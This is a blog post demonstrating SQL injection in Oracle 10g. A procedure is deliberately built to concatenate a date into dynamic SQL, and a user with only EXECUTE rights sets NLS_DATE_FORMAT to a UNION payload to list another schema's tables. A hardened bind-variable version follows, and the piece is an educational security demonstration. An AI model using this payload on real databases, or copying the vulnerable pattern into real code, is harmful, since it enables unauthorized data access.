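Oracle: an easy little SQL injection
Today I read something interesting from Tom: granting nothing more than EXECUTE on a procedure can be enough for someone else to perform SQL injection, so be careful from now on. My experiment follows.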
[oracle@aix ~]$ sqlplus anbob/anbob
SQL*Plus: Release 10.2.0.4.0 - Production on Tue Aug 30 18:52:41 2011
Copyright (c) 1982, 2007, Oracle. All Rights Reserved.
Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
SQL> select * from v$version;
BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bi
PL/SQL Release 10.2.0.4.0 - Production
CORE 10.2.0.4.0 Production
TNS for Linux: Version 10.2.0.4.0 - Production
NLSRTL Version 10.2.0.4.0 - Production
SQL> select * from all_users;
USERNAME USER_ID CREATED
------------------------------ ---------- -------------------
ZYY 1099 2011-08-30 11:41:03
GZPX_DB 1070 2011-08-30 11:41:01
GIAF 1069 2011-08-30 11:41:01
DEAN_TRAIN 1068 2011-08-30 11:41:01
...
75 rows selected.
SQL> select * from tab;
TNAME TABTYPE CLUSTERID
------------------------------ ------- ----------
TEST TABLE
TESTA TABLE
TESTB TABLE
TESTBLOB TABLE
TESTC TABLE
TESTIMG TABLE
TESTKDR TABLE
TESTXY TABLE
8 rows selected.
SQL> create or replace procedure badboy( p_date in date )
2 as
3 l_rec all_users%rowtype;
4 c sys_refcursor;
5 l_query long;
6 begin
7 l_query := 'select * from all_users where created = ''' ||p_date ||'''';
8 dbms_output.put_line( l_query );
9 open c for l_query;
10 for i in 1 .. 10
11 loop
12 fetch c into l_rec;
13 exit when c%notfound;
14 dbms_output.put_line( l_rec.username || '.....' );
15 end loop;
16 close c;
17 end;
18 /
Procedure created.
SQL> set serveroutput on;
SQL> exec badboy(sysdate);
select * from all_users where created = '2011-08-30 18:55:04'
PL/SQL procedure successfully completed.
SQL> grant execute on badboy to icme;
Grant succeeded.
SQL> conn icme/icme
Connected.
SQL> set serveroutput on
SQL> exec anbob.badboy(sysdate);
select * from all_users where created = '2011-08-30 18:57:44'
PL/SQL procedure successfully completed.
SQL> alter session set nls_date_format = '"''union select tname,0,sysdate from tab--"';
Session altered.
SQL> exec anbob.badboy(sysdate);
select * from all_users where created = ''union select tname,0,sysdate from tab--'
TEST.....
TESTA.....
TESTB.....
TESTBLOB.....
TESTC.....
TESTIMG.....
TESTKDR.....
TESTXY.....
PL/SQL procedure successfully completed.
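Look familiar? These are of course anbob's tables, and no privileges on them were ever granted to icme. The columns can be obtained from all_column in the same way, and with those, part of the data in the tables can be retrieved...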
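For comparison, a hardened counterpart of badboy, added here as an example and not part of the original post. The name goodboy is hypothetical. The date is passed as a bind variable, so the caller's NLS_DATE_FORMAT never reaches the SQL text:

```sql
-- Added example: hardened counterpart of badboy (goodboy is a hypothetical name).
create or replace procedure goodboy( p_date in date )
authid current_user  -- defense in depth: names in the dynamic SQL resolve with
                     -- the caller's schema and privileges, not the owner's
as
    l_rec   all_users%rowtype;
    c       sys_refcursor;
    l_query varchar2(200);
begin
    -- The statement text is a constant. p_date is never concatenated into it,
    -- so no implicit DATE-to-string conversion happens and the session's
    -- NLS_DATE_FORMAT cannot change what the SQL engine parses.
    l_query := 'select * from all_users where created = :d';
    dbms_output.put_line( l_query );

    -- The DATE value travels as a bind and is compared as a DATE.
    open c for l_query using p_date;
    for i in 1 .. 10
    loop
        fetch c into l_rec;
        exit when c%notfound;
        dbms_output.put_line( l_rec.username || '.....' );
    end loop;
    close c;
end;
/

-- Same grant as in the experiment above.
grant execute on goodboy to icme;

-- As icme, after the same ALTER SESSION as above, the printed statement is
-- still: select * from all_users where created = :d
-- exec anbob.goodboy(sysdate);
```

If a date really has to appear as a literal in dynamic SQL, convert it with an explicit mask such as to_char(p_date, 'YYYY-MM-DD HH24:MI:SS') instead of relying on the implicit conversion that `||` performs.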
From "ITPUB Blog", link: http://blog.itpub.net/23368118/viewspace-706301/. If you repost this, please credit the source; otherwise legal liability will be pursued.